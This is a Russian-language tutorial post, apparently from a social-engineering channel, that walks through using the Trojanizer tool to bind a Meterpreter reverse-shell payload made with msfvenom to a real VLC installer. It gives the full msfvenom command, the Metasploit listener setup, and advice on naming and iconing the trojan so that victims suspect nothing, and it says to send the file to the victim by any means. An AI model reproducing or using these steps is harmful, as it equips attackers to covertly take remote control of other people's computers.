Обзор и пара трюков с инструментом Trojanizer.

Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).

Скачиваем.

git clone https://github.com/r00t-3xp10it/trojanizer.git

Далее создаем пейлоад, используя msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Запуск Trojanizer

Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.

После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.

После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize.

Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.

После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.

Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.

Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.

После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.

А теперь давайте поднимем Listener в Metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -j

Отправляем вредоносную программу на машину жертвы любым удобным способом.

Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.

После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.

Но в тоже время, у нас будет meterpreter сессия, как показано ниже.

Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.

Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)

S.E.Book - Литература социального инженера.

@Social_Engineering_bot - Бот обратной связи.

1. OSINT. Собираем информацию о сайте.
2. Выборочное шифрование трафика в Linux.
3. OSINT. Собираем информацию по Email.
4. 5-Шаговая модель вербовки противника.
5. Как учиться пентесту. Советы экспертов и авторов журнала «Хакер»
6. Методика получения интересующей информации.

Источник.